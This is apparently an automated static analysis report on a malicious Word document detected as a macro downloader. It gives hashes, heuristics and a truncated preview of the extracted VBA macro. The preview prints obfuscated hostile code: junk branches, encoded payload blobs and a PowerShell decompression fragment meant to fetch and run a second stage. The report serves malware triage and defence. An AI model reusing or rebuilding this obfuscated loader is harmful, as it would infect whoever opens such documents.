Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 529b401615e32560…

MALICIOUS

Office (OLE)

157.5 KB Created: 2018-04-04 12:10:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: 72ef8b050aec2f104d0dd22dfa5e2a49 SHA-1: c1be8e46be059e081f76926159364d497d17301d SHA-256: 529b401615e325605ee854c39b107daac46d423b630c0f521d4bb0384681892e
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is obfuscated but appears to be designed to download and execute a second-stage payload, as indicated by the CreateObject call and the presence of a long encoded blob. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature. The macro uses VBA, aligning with T1059.005.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46549 bytes
SHA-256: 5290e0c6df65a9c6c63fec4cfb835e5357306c561551114634e6a8d51523aacb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 13 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "rIXpwWNrWaszR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zAjclPaXiwkzu"
Function SWauqtbXEYC()
On Error Resume Next
Select Case HzwjHG
         Case 96503

            nVRUaU = 77103
            ETZCAG = Sqr(32686)
         Case 30823

            dXTWPz = CSng(Eshrip)
            TMUOO = HPQiR
End Select
ivWUdpOGs = hblGa("nMmY4KPqX707w791/') , [sYstEm.Io.cOmPRESsION.ComPRESsioNMOdE]::decOMPRESS ) ), [text.eNcOdiNG]::aSCiI) ).ReAdtOEnD( ) QuDRA", 3, 116)
Select Case GNbmBi
         Case 66396

            djiIYY = 49271
            inwNP = Sqr(14848)
         Case 11609

            jsCtbO = CSng(oEard)
            GfJwsi = hMpqwr
End Select
Select Case KJzFOS
         Case 19930

            BwidH = 24117
            ATjRN = Sqr(28096)
         Case 17021

            mmHHG = CSng(VaLcjj)
            CTXJcv = uGDrW
End Select
UsmdvB = hblGa("r0UU/FSxwEj/eIujm+vF689Rl", 3, 19)
Select Case vUqcOX
         Case 3664

            MTGKEP = 62151
            SAXdk = Sqr(95786)
         Case 99897

            IlSqV = CSng(iPkQAA)
            iOMhjq = RwXjmZ
End Select
Select Case AfVAD
         Case 49987

            zlTkdU = 95660
            pNnsI = Sqr(25980)
         Case 20226

            DWpOi = CSng(IjpJG)
            IhREX = rjQam
End Select
VhIdmV = hblGa("PaFBkrDtjGRhigPu6x3IOAkcpxvDPp+/Papqh5bUYSG@4DD", 5, 38)
Select Case JUztHq
         Case 36211

            pKSdOL = 12765
            dnvTNr = Sqr(235)
         Case 15619

            iUuVbE = CSng(kqEOYP)
            zqIQz = nqMHQ
End Select
Select Case RLYaJ
         Case 37838

            YDWqd = 25160
            cZwdm = Sqr(55644)
         Case 36314

            fJHOi = CSng(BkSvv)
            RiHPIc = IJPjQQ
End Select
POKDVP = hblGa(".7tJ,B+sTV75+Kd6uHTdb1N3x7PjCPs5Lj2OtcyPxwDilB/w8vbZ6/qHDLeMeCgcj8sPjCeJx7fXdveDR8cFzoY/Il3UgrsDPg9ZDb9DHMXB+UJw9z5O4AA760o+DWht", 7, 119)
Select Case zsXTjT
         Case 92598

            fPSvlv = 45520
            DviNz = Sqr(95544)
         Case 34218

            UKCKJP = CSng(rzHTIN)
            ObDSzs = MrfkqL
End Select
Select Case wsCPUO
         Case 88133

            SEhzo = 68073
            dPjPJ = Sqr(78908)
         Case 28787

            EXKEK = CSng(uoCBP)
            zwnjsw = cGqOGh
End Select
vzhARl = hblGa("FMdI/KfpN9Ep9q8DXr31q+qhJvK8ZPPT6yjqwz+7vWXK7E+yCdq5kP60bdi/SjnKt5LmRdiC8+CvjN8zOSnxP4zqPyGKov8KfBiDfovvfNONfyPKS/qsR3E08qzYfpy2uT/Y/zakr/S5050CeyD6w/eHuQrh+k671Onyi2tb", 4, 161)
Select Case XtATw
         Case 98636

            mzrKJj = 84817
            QivYF = Sqr(3122)
         Case 63383

            AXMqmA = CSng(JDWIp)
            njFQv = zwViN
End Select
Select Case CnpHU
         Case 3559

            MQQQt = 23382
            zzlOwc = Sqr(89551)
         Case 82376

            Sjkhkz = CSng(YcDSBw)
            IIXIA = WFNYuR
End Select
rzVSzJmfc = hblGa("D5Chdr6gPuobcOp98fdT3wfxd3xBXJXijv7+wP6qztHjiN0+zBv8GQiXI8+jFn6C49frZMxn1VAPGF/Q+0rfixfE+0g60fN1c/CkFh+Aw41wLn4T3+AjnWdbc", 3, 115)
Select Case vbpPZL
         Case 83583

            bjUYM = 62972
            nqtdBa = Sqr(54968)
         Case 12992

            UuwYN = CSng(MnSVo)
            nntpEA = YCjnLf
End Select
Select Case MKjVhA
         Case 14264

            UHcdA = 89651
            owqihr = Sqr(4258)
         Case 24575

            OKLZWw = CSng(qJvQK)
            BFsDMF = lhqPW
End Select
EPFiPnYO = hblGa("Bhwrgs2a6+82riyte7Cbxubx+qN/ftfa0f6o7M9oV3bT+udfbFxb3drIxlObtdc7G5utorU2ibZqbGDjaMGfS+tmrfXwGtO+k/RcY882wXNbP28WrbTxzoKl/SaV758+X/p+Q183t7Rfeg3xeuOfp+c2Nlmm832/yPP93Mg4Zr4pi@NcN", 4, 168)
Select Case YbzcsJ
         Case 95286

            HWpio = 45468
            mUEiXu = Sqr(92785)
         Case 70240

            ifwvpj
... (truncated)